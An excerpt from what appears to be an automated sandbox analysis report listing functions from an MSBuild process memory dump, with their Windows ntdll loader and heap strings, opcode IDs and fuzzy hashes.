                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-176724104
                                                                                                              • Opcode ID: 8001b49b0beacc2f34832c859fe80033a453b4db764aee9dc8e4549835b1e87e
                                                                                                              • Instruction ID: 0c8d5a04295403a6764cbb3e67ed2feb7f85dccd5711946cc94ca9f2ca09e767
                                                                                                              • Opcode Fuzzy Hash: 8001b49b0beacc2f34832c859fe80033a453b4db764aee9dc8e4549835b1e87e
                                                                                                              • Instruction Fuzzy Hash: 6A312C71600201EFDB3EEF5DB849A6EBBB4FF84714F1A0159E90167356D7B05991CB80
                                                                                                              Function 011229A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 01123255
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0112327D
                                                                                                              • HEAP: , xrefs: 01123264
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              • API String ID: 0-617086771
                                                                                                              • Opcode ID: f9985c8ca1995df7661cfe19e732e4307c8e9f2504effc8138a5e0076adc688d
                                                                                                              • Instruction ID: a8794860c20687d3875e6e13caa97cc57d0f92567622364ae0396d258f49ada7
                                                                                                              • Opcode Fuzzy Hash: f9985c8ca1995df7661cfe19e732e4307c8e9f2504effc8138a5e0076adc688d
                                                                                                              • Instruction Fuzzy Hash: 6F92CD71A042699FDB2DCF68C444BAEBBF1FF49304F188059E899AB391D338A951CF50
                                                                                                              Function 01120770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-4253913091
                                                                                                              • Opcode ID: 32e8e74a18d492e962440027394acb333078b9a84fb0b8176560f59eb763fec2
                                                                                                              • Instruction ID: c3def61dd91ebf5de88594f8f993d1c0774a7786d17096f794710d9588e054ef
                                                                                                              • Opcode Fuzzy Hash: 32e8e74a18d492e962440027394acb333078b9a84fb0b8176560f59eb763fec2
                                                                                                              • Instruction Fuzzy Hash: 3EF1BE30B00616DFEB1DCF68C894B6AB7B6FF49304F148268E5169B392D734E991CB91
                                                                                                              Function 01136962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $@
                                                                                                              • API String ID: 0-1077428164
                                                                                                              • Opcode ID: 01f180a2d4b34a43289562809eb19fa3caff7eff2e0663767eebba5906ece368
                                                                                                              • Instruction ID: 161c4d881b811b3fe7aebb0cd235db58412852baa7b60ef2fd3deb2e8e8f0189
                                                                                                              • Opcode Fuzzy Hash: 01f180a2d4b34a43289562809eb19fa3caff7eff2e0663767eebba5906ece368
                                                                                                              • Instruction Fuzzy Hash: 43C270B16083419FE729CF28C880BABBBE5AFC8754F05892DF98987345D734D945CB92
                                                                                                              Function 0110A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              • API String ID: 0-2779062949
                                                                                                              • Opcode ID: 7355f35b5386a2abd5dab1da9c90404037726c291638b82e3b717ec4f6addc78
                                                                                                              • Instruction ID: 4cb80959cf49f14e411c0ad01f319ebce5b826b4b04c8fe7f3b45c2e8a1e49bb
                                                                                                              • Opcode Fuzzy Hash: 7355f35b5386a2abd5dab1da9c90404037726c291638b82e3b717ec4f6addc78
                                                                                                              • Instruction Fuzzy Hash: 43A16E72D112299BDB35DF68CC88BEAB7B8EF48714F1041E9E908A7250D7359E84CF90
                                                                                                              Function 01130BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0117A10F
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0117A121
                                                                                                              • LdrpCheckModule, xrefs: 0117A117
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-161242083
                                                                                                              • Opcode ID: 959d1d689be7417ea5c43c1f06cf0f60cda3e5299b67819a5b40e0169d9bc835
                                                                                                              • Instruction ID: 8baa406f88ae7721c99572b4d4c2836143abccf252289ad8d313794ffcf162a3
                                                                                                              • Opcode Fuzzy Hash: 959d1d689be7417ea5c43c1f06cf0f60cda3e5299b67819a5b40e0169d9bc835
                                                                                                              • Instruction Fuzzy Hash: CB71D070A00205DFDB2EDF68E984AAEB7F4FF88604F19456DE90297356E734AD41CB41
                                                                                                              Function 01120A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-1334570610
                                                                                                              • Opcode ID: 35034b05331166fada5c8cef3818fdd303c90f0357bb2584308748fe8b27d411
                                                                                                              • Instruction ID: 870867e45931910c8b07508145991747459f2decbe5847ebdbd8538cefaf7aeb
                                                                                                              • Opcode Fuzzy Hash: 35034b05331166fada5c8cef3818fdd303c90f0357bb2584308748fe8b27d411
                                                                                                              • Instruction Fuzzy Hash: 7461AC746043159FDB2DCF28C484B6ABBF2FF49308F14865AE4598B292D770E891CB91
                                                                                                              Function 0114C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 011882D7
                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 011882DE
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 011882E8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1783798831
                                                                                                              • Opcode ID: cf4af227b2216366bd90c13e3a9e256ea6e7277a124d76e918d3063435d207e6
                                                                                                              • Instruction ID: 7d61e646718e5fe00545b85a65e5ba655d2e501e0684ad3fd9ae6be7d675faa3
                                                                                                              • Opcode Fuzzy Hash: cf4af227b2216366bd90c13e3a9e256ea6e7277a124d76e918d3063435d207e6
                                                                                                              • Instruction Fuzzy Hash: 32412471545301AFD72AEB68EC44B5B77E8AF44A54F00462AF949C7292E774D800CBD1
                                                                                                              Function 011CC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • PreferredUILanguages, xrefs: 011CC212
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 011CC1C5
                                                                                                              • @, xrefs: 011CC1F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                              • API String ID: 0-2968386058
                                                                                                              • Opcode ID: 3a5c3420ed516fdb5e557743d5868ef94ef55adda775a689bb56625fcd3223f5
                                                                                                              • Instruction ID: 5968e77f969bd729c19ba52148d7abfa7ca0c2f7c4df4a13bb6f4ca0150bdc37
                                                                                                              • Opcode Fuzzy Hash: 3a5c3420ed516fdb5e557743d5868ef94ef55adda775a689bb56625fcd3223f5
                                                                                                              • Instruction Fuzzy Hash: 72416671E00219EBDF19DAD8C851FEEBBBAAB64B04F14406EE619F7240D7749E44CB90
                                                                                                              Function 011A4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                              • API String ID: 0-1373925480
                                                                                                              • Opcode ID: 2e91c6fd21cdac8e7832ffbefdc488bd7c7bdffddce2ee082891c6c61a0ace24
                                                                                                              • Instruction ID: ce28dfea1f7169ce614c80902e28afcff79eba97fe923f1f8c7a1cff1aec7090
                                                                                                              • Opcode Fuzzy Hash: 2e91c6fd21cdac8e7832ffbefdc488bd7c7bdffddce2ee082891c6c61a0ace24
                                                                                                              • Instruction Fuzzy Hash: 2C4126359003588BEB2DDBE8D840BACBFB4FF55354F58046AD911EBB82D7B4A901CB11
                                                                                                              Function 01194755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01194888
                                                                                                              • LdrpCheckRedirection, xrefs: 0119488F
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01194899
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-3154609507
                                                                                                              • Opcode ID: ee2f1b7a19549e6cb1d1f3288e05bba12c17ca48e38e37b50503120e2667e87f
                                                                                                              • Instruction ID: 7b4b5d4fb4e8ceb637882b0af743cf3c563c53c65fa38528e8dd2047ed5c3f32
                                                                                                              • Opcode Fuzzy Hash: ee2f1b7a19549e6cb1d1f3288e05bba12c17ca48e38e37b50503120e2667e87f
                                                                                                              • Instruction Fuzzy Hash: 4C41E732A146519FCF2DCE9DD640A267BE4EF49A54F06065DEDA4DBB11D330D802CB81
                                                                                                              Function 01120BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-2558761708
                                                                                                              • Opcode ID: 63dab59985fdf4d3c2515ab38d5f248664836ef79aac376027c7823895e221ec
                                                                                                              • Instruction ID: 5bb8a512c607e10bbe8f489ac08b334e826683088fb32bf203ae65d621fbbe1c
                                                                                                              • Opcode Fuzzy Hash: 63dab59985fdf4d3c2515ab38d5f248664836ef79aac376027c7823895e221ec
                                                                                                              • Instruction Fuzzy Hash: 8811E1353541129FDB6ECB18C454B36B7A6EF45619F19822DF406CB391EB30E850C756
                                                                                                              Function 011920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01192104
                                                                                                              • LdrpInitializationFailure, xrefs: 011920FA
                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 011920F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2986994758
                                                                                                              • Opcode ID: b89ff562ac04c3aa6a4be4397d44fa60af8352c1240318fd32c5bd70d96ace58
                                                                                                              • Instruction ID: c65fcd17dd13081d1106a391cbdc91035ad1d7e2310bcc9d277005956cdca8fa
                                                                                                              • Opcode Fuzzy Hash: b89ff562ac04c3aa6a4be4397d44fa60af8352c1240318fd32c5bd70d96ace58
                                                                                                              • Instruction Fuzzy Hash: CCF0C275641308BFEB28E64DDC47F99376CFB40B58F54006DFB506B682E3B0A950CA91
                                                                                                              Function 011203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: #%u
                                                                                                              • API String ID: 48624451-232158463
                                                                                                              • Opcode ID: 7d863da81fe4b835624ebfb99554e78133f96fb0c4996998b0cccd52d27fb537
                                                                                                              • Instruction ID: d2fdedf95773b9cec522411cc15f513e315a879bb63bbc09c301f068ea4b5c8f
                                                                                                              • Opcode Fuzzy Hash: 7d863da81fe4b835624ebfb99554e78133f96fb0c4996998b0cccd52d27fb537
                                                                                                              • Instruction Fuzzy Hash: A0717A71A0015A9FDB09DFA8C984BAEB7F8FF18348F154165E904E7251EB38EE51CB60
                                                                                                              Function 0111A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrResSearchResource Exit, xrefs: 0111AA25
                                                                                                              • LdrResSearchResource Enter, xrefs: 0111AA13
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                              • API String ID: 0-4066393604
                                                                                                              • Opcode ID: 59877f070ea6549527d3646421aa39de775ad60a3b39d1fe5da0b7f7b2080c51
                                                                                                              • Instruction ID: 3368334767c6b9800853cf6e555aea1d26954234fb63ca251f05e0a0105974a0
                                                                                                              • Opcode Fuzzy Hash: 59877f070ea6549527d3646421aa39de775ad60a3b39d1fe5da0b7f7b2080c51
                                                                                                              • Instruction Fuzzy Hash: 2FE1B171A012999FEF2ECEA8E980BAEFFB9BF04314F150436EA11E7245D7349941CB51
                                                                                                              Function 011DA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `$`
                                                                                                              • API String ID: 0-197956300
                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction ID: e853552934fa1a130efdc98cd839adb7fcff2a0e6ab645251dbdcf6271c50d7e
                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction Fuzzy Hash: 32C1C2312043469BEB29CF28D841B6BBBE5BFC4318F184A2DF696CB290D775E505CB42
                                                                                                              Function 0118E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Legacy$UEFI
                                                                                                              • API String ID: 2994545307-634100481
                                                                                                              • Opcode ID: 6b50d03404a261eb37ea3da859f13c2f1899e38c1fccfa843b5944fc3e3965df
                                                                                                              • Instruction ID: 5b59bc3c50e71b27b2be0653d23574e689c4f7d9a5c28932d17ad05429069236
                                                                                                              • Opcode Fuzzy Hash: 6b50d03404a261eb37ea3da859f13c2f1899e38c1fccfa843b5944fc3e3965df
                                                                                                              • Instruction Fuzzy Hash: 72616C71E117199FDB18EFA9C840BAEBBB9FB45704F14802DEA59EB251E731A900CF50
                                                                                                              Function 011B43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$MUI
                                                                                                              • API String ID: 0-17815947
                                                                                                              • Opcode ID: 1f9d8986b0b2455cb6bb279ef02be8bccff0bc99e3951cfb6b3fd0a2bcb3102f
                                                                                                              • Instruction ID: 4d7bfafcd5ef7ea3dc99f448dc4720dcc328742d53c18d9c183d10f562022f46
                                                                                                              • Opcode Fuzzy Hash: 1f9d8986b0b2455cb6bb279ef02be8bccff0bc99e3951cfb6b3fd0a2bcb3102f
                                                                                                              • Instruction Fuzzy Hash: A0514971E0061DAFDF15DFE9CC80AEEBBB8EB48758F10452AEA11B7681D7349905CB60
                                                                                                              Function 011104E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0111063D
                                                                                                              • kLsE, xrefs: 01110540
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                              • API String ID: 0-2547482624
                                                                                                              • Opcode ID: d0863a856d64aa3c4407bbef7dbb0a0272d0e226fcbe64c52cbda041ee39483b
                                                                                                              • Instruction ID: 33de604759a17b088fc323aed43f67febef2097b136a94be1ce078c68ba5ffd2
                                                                                                              • Opcode Fuzzy Hash: d0863a856d64aa3c4407bbef7dbb0a0272d0e226fcbe64c52cbda041ee39483b
                                                                                                              • Instruction Fuzzy Hash: EE51AD719047428FD729EF28C5446A7FBE4AF88304F104C3EFAEA87245E7709985CB92
                                                                                                              Function 0111A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0111A2FB
                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0111A309
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                              • API String ID: 0-2876891731
                                                                                                              • Opcode ID: f691ae1542e8ca8e2cef881b772856cbd8099b6cc5cf006cce4635059c6a4b9d
                                                                                                              • Instruction ID: f663023e1266ecc09e74490bb2fb214741a5c771de025973a3c768fe878eed53
                                                                                                              • Opcode Fuzzy Hash: f691ae1542e8ca8e2cef881b772856cbd8099b6cc5cf006cce4635059c6a4b9d
                                                                                                              • Instruction Fuzzy Hash: C641FF30A19299DBDB2ECF69D840B6EBBB4FF84704F2440A5E910DB395E3B5DA01CB51
                                                                                                              Function 0114A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                              • Opcode ID: a9a6f18889193d05ec3604051b9470ab4a1972d486ca929f85ab064d0bcf555b
                                                                                                              • Instruction ID: 1e9e3bc0231fd517323a12a89c732bb1e89cf71f8b66308e7c8de190d7b06e1e
                                                                                                              • Opcode Fuzzy Hash: a9a6f18889193d05ec3604051b9470ab4a1972d486ca929f85ab064d0bcf555b
                                                                                                              • Instruction Fuzzy Hash: A101F4B2280700EFD311DF14ED49F1677E8EB84B19F028939A659CB590E774D804CB4A
                                                                                                              Function 0111C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MUI
                                                                                                              • API String ID: 0-1339004836
                                                                                                              • Opcode ID: 25999db175725057dbfb8fd5e92dc00e2e26d891436fc47caaf581d9919fdf9a
                                                                                                              • Instruction ID: d7b57db608cf41fd6880122baf88d241e18608c0875b31de1346f741420eb6aa
                                                                                                              • Opcode Fuzzy Hash: 25999db175725057dbfb8fd5e92dc00e2e26d891436fc47caaf581d9919fdf9a
                                                                                                              • Instruction Fuzzy Hash: 79828A75E402198BEF29CFA8D884BEDFBB1BF48350F148179D919AB258D7309941CB91
                                                                                                              Function 01196420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: aa587cd2ac4f8fffe7a41e04b869ae422b6b0fd94404e6d5eb933263b86c6652
                                                                                                              • Instruction ID: 2e2ee6d64bb331ac80ac84db50fc19b3adb7ec4fb45fa7a4568d359029b15f83
                                                                                                              • Opcode Fuzzy Hash: aa587cd2ac4f8fffe7a41e04b869ae422b6b0fd94404e6d5eb933263b86c6652
                                                                                                              • Instruction Fuzzy Hash: 07916072900219AFEB29DF95CC85FEEBBB8EF58754F100025F610AB194D774AD04CBA0
                                                                                                              Function 011BE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: d7c6473f916bf4b5107cbc9ad6a267df78796f1366e87a1c282e77aa243844b8
                                                                                                              • Instruction ID: 3c20627ddeeca9fa208119c30d5baa64a81f5b2d833d2638c5df95a53df1af1b
                                                                                                              • Opcode Fuzzy Hash: d7c6473f916bf4b5107cbc9ad6a267df78796f1366e87a1c282e77aa243844b8
                                                                                                              • Instruction Fuzzy Hash: 8E91BF32902609AFDB2AAFA5DC84FEFBB79EF85744F100029F511A7260E7749901CB91
                                                                                                              Function 0114A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: GlobalTags
                                                                                                              • API String ID: 0-1106856819
                                                                                                              • Opcode ID: 2761eafb55a5572dfefa90815c0319a4fbff2cb589cfe6eeb4f0cb42a4a8d12d
                                                                                                              • Instruction ID: 7c85ce8269563817827a99fd9c83012c52e09720d88d0b7be1922a5271827042
                                                                                                              • Opcode Fuzzy Hash: 2761eafb55a5572dfefa90815c0319a4fbff2cb589cfe6eeb4f0cb42a4a8d12d
                                                                                                              • Instruction Fuzzy Hash: EA715CB5E0021A8FDF2DEF98D5906EDBBB2BF48704F14C12AE506AB245E7319941CF90
                                                                                                              Function 011B4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .mui
                                                                                                              • API String ID: 0-1199573805
